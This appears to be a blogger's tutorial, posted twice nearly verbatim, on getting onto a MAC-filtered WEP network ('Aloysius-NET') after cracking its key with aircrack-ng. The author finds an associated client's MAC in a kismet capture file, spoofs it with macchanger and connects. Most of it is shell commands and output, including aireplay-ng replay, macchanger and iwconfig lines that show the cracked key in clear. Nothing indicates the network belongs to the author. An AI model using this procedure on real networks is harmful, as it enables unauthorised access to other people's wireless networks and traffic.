WEP key problem [SOLVED]
my machine
ubuntu 9.10
linksys wusb54g ver 4
chipset ralink 2570
aircrack-ng 1.1
i have a problem with WEP key..
after i crack IVS with aircrack-ng, key found! but can't connect to access point.
the access point keep ask me for the WEP key.
the key is correct! what's wrong then?
access point filter mac address! only client mac address can connect to it.
so the solution is use client mac address! ^_^
if you remember client mac then change u'r mac with client mac.
what is client mac address?
client mac address is the mac address that u're spoofing with aireplay-ng.
aireplay-ng -3 -b -h
i forgot client mac address.. -___-
if u start capture replies there is 4 file created.
-rw-r--r-- 1 root root 86179840 2011-07-03 01:08 qwe-01.cap
-rw-r--r-- 1 root root 769 2011-07-03 01:08 qwe-01.csv
-rw-r--r-- 1 root root 591 2011-07-03 01:08 qwe-01.kismet.csv
-rw-r--r-- 1 root root 5711 2011-07-03 01:08 qwe-01.kismet.netxml
now search client mac address in qwe-01.kismet.netxml file.
find a client with big packet.
root@evilc0de:/home/noge# cat qwe-01.kismet.netxml
---cut---
---cut---
the packet is big enough69983
yey!! i found my client4C:0F:6E:60:25:AC .. :))
see u'r interface..
my interface is wlan3 and my default mac address is 00:1d:7e:09:6b:0a.
we need to change default mac <00:1d:7e:09:6b:0a> with client mac <4C:0F:6E:60:25:AC>
root@evilc0de:/home/noge# ifconfig wlan3
wlan3 Link encap:Ethernet HWaddr 00:1d:7e:09:6b:0a
inet6 addr: fe80::21d:7eff:fe09:6b0a/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:3816 (3.8 KB)
if we run iwconfig we can see no connection there.
Access Point: Not-Associated
Encryption key:off
root@evilc0de:/home/noge# iwconfig wlan3
wlan3 IEEE 802.11bg Mode:Managed Frequency:2.457 GHz
Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
let's change our mac!
first i'll set my interface down so i can change the mac address.
root@evilc0de:/home/noge# ifconfig wlan3 down
now change the mac with macchanger.
root@evilc0de:/home/noge# macchanger -m 4C:0F:6E:60:25:AC wlan3
Current MAC: 00:1d:7e:09:6b:0a (unknown)
Faked MAC: 4c:0f:6e:60:25:ac (unknown)
bring it up again..
root@evilc0de:/home/noge# ifconfig wlan3 up
as u can see below my mac address has change 4c:0f:6e:60:25:ac.
root@evilc0de:/home/noge# ifconfig wlan3
wlan3 Link encap:Ethernet HWaddr 4c:0f:6e:60:25:ac
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:3816 (3.8 KB)
now try to connect with the access point.
walla!! its connected.. ^___^
ESSID:"Aloysius-NET"
Access Point: 00:02:6F:54:04:75
Encryption key:0987-6123-45
root@evilc0de:/home/noge# iwconfig wlan3
wlan3 IEEE 802.11bg ESSID:"Aloysius-NET"
Mode:Managed Frequency:2.462 GHz Access Point: 00:02:6F:54:04:75
Bit Rate=1 Mb/s Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:0987-6123-45
Power Management:on
Link Quality=40/70 Signal level=-70 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
ping test..
root@evilc0de:/home/noge# ping antisecurity.org
PING antisecurity.org (168.144.82.176) 56(84) bytes of data.
64 bytes from 168.144.82.176: icmp_seq=1 ttl=56 time=740 ms
64 bytes from 168.144.82.176: icmp_seq=2 ttl=56 time=1082 ms
64 bytes from 168.144.82.176: icmp_seq=3 ttl=56 time=778 ms
64 bytes from 168.144.82.176: icmp_seq=4 ttl=56 time=797 ms
64 bytes from 168.144.82.176: icmp_seq=6 ttl=56 time=711 ms
^Z
[8]+ Stopped ping antisecurity.org
root@evilc0de:/home/noge#
so if you have WEP key but can't connect to the access point, try change u'r mac with client mac.
big thanks to bob and array
salam from papua.. :)
ubuntu 9.10
linksys wusb54g ver 4
chipset ralink 2570
aircrack-ng 1.1
i have a problem with WEP key..
after i crack IVS with aircrack-ng, key found! but can't connect to access point.
the access point keep ask me for the WEP key.
the key is correct! what's wrong then?
access point filter mac address! only client mac address can connect to it.
so the solution is use client mac address! ^_^
if you remember client mac then change u'r mac with client mac.
what is client mac address?
client mac address is the mac address that u're spoofing with aireplay-ng.
aireplay-ng -3 -b
i forgot client mac address.. -___-
if u start capture replies there is 4 file created.
-rw-r--r-- 1 root root 86179840 2011-07-03 01:08 qwe-01.cap
-rw-r--r-- 1 root root 769 2011-07-03 01:08 qwe-01.csv
-rw-r--r-- 1 root root 591 2011-07-03 01:08 qwe-01.kismet.csv
-rw-r--r-- 1 root root 5711 2011-07-03 01:08 qwe-01.kismet.netxml
now search client mac address in qwe-01.kismet.netxml file.
find a client with big packet.
root@evilc0de:/home/noge# cat qwe-01.kismet.netxml
---cut---
---cut---
the packet is big enough
yey!! i found my client
see u'r interface..
my interface is wlan3 and my default mac address is 00:1d:7e:09:6b:0a.
we need to change default mac <00:1d:7e:09:6b:0a> with client mac <4C:0F:6E:60:25:AC>
root@evilc0de:/home/noge# ifconfig wlan3
wlan3 Link encap:Ethernet HWaddr 00:1d:7e:09:6b:0a
inet6 addr: fe80::21d:7eff:fe09:6b0a/64 Scope:Link
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:3816 (3.8 KB)
if we run iwconfig we can see no connection there.
Access Point: Not-Associated
Encryption key:off
root@evilc0de:/home/noge# iwconfig wlan3
wlan3 IEEE 802.11bg Mode:Managed Frequency:2.457 GHz
Access Point: Not-Associated Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:off
Power Management:on
Link Quality:0 Signal level:0 Noise level:0
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
let's change our mac!
first i'll set my interface down so i can change the mac address.
root@evilc0de:/home/noge# ifconfig wlan3 down
now change the mac with macchanger.
root@evilc0de:/home/noge# macchanger -m 4C:0F:6E:60:25:AC wlan3
Current MAC: 00:1d:7e:09:6b:0a (unknown)
Faked MAC: 4c:0f:6e:60:25:ac (unknown)
bring it up again..
root@evilc0de:/home/noge# ifconfig wlan3 up
as u can see below my mac address has change 4c:0f:6e:60:25:ac.
root@evilc0de:/home/noge# ifconfig wlan3
wlan3 Link encap:Ethernet HWaddr 4c:0f:6e:60:25:ac
UP BROADCAST MULTICAST MTU:1500 Metric:1
RX packets:0 errors:0 dropped:0 overruns:0 frame:0
TX packets:15 errors:0 dropped:0 overruns:0 carrier:0
collisions:0 txqueuelen:1000
RX bytes:0 (0.0 B) TX bytes:3816 (3.8 KB)
now try to connect with the access point.
walla!! its connected.. ^___^
ESSID:"Aloysius-NET"
Access Point: 00:02:6F:54:04:75
Encryption key:0987-6123-45
root@evilc0de:/home/noge# iwconfig wlan3
wlan3 IEEE 802.11bg ESSID:"Aloysius-NET"
Mode:Managed Frequency:2.462 GHz Access Point: 00:02:6F:54:04:75
Bit Rate=1 Mb/s Tx-Power=20 dBm
Retry long limit:7 RTS thr:off Fragment thr:off
Encryption key:0987-6123-45
Power Management:on
Link Quality=40/70 Signal level=-70 dBm
Rx invalid nwid:0 Rx invalid crypt:0 Rx invalid frag:0
Tx excessive retries:0 Invalid misc:0 Missed beacon:0
ping test..
root@evilc0de:/home/noge# ping antisecurity.org
PING antisecurity.org (168.144.82.176) 56(84) bytes of data.
64 bytes from 168.144.82.176: icmp_seq=1 ttl=56 time=740 ms
64 bytes from 168.144.82.176: icmp_seq=2 ttl=56 time=1082 ms
64 bytes from 168.144.82.176: icmp_seq=3 ttl=56 time=778 ms
64 bytes from 168.144.82.176: icmp_seq=4 ttl=56 time=797 ms
64 bytes from 168.144.82.176: icmp_seq=6 ttl=56 time=711 ms
^Z
[8]+ Stopped ping antisecurity.org
root@evilc0de:/home/noge#
so if you have WEP key but can't connect to the access point, try change u'r mac with client mac.
big thanks to bob and array
salam from papua.. :)